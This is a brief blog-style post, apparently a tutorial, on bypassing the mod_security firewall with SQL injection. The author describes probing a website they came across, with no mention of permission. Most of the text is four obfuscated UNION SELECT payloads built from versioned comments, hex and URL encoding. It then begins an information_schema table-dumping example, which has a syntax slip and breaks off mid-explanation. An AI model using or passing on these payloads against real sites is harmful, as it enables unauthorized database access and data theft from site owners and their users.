Hello, this time I would like to share with you how to evade the WAF mod_security.
Looking for vulnerable pages I came across a website that, after spending a little time on it, I realized that it could be vulnerable to sql injections, then I realized that it was “protected” with mod_security and decided to see if I could skip the waf.
I share how I did it …
sql injection + bypass Mod_Security
/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)
/*!50000%75%6e%69on*/ %73%65%6cect 1
/*!12345UnioN*//**/(/*!12345seLECT*//**/1)
/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)
In this part I would like to give an example of how to create an encoded payload. First we are going to define the payload that we want to encode: union select 1,2,3,concat(table_name),5 from information_schema.tables table_schema = database() this case we are using the payload without any coding, but we have more ways to declare…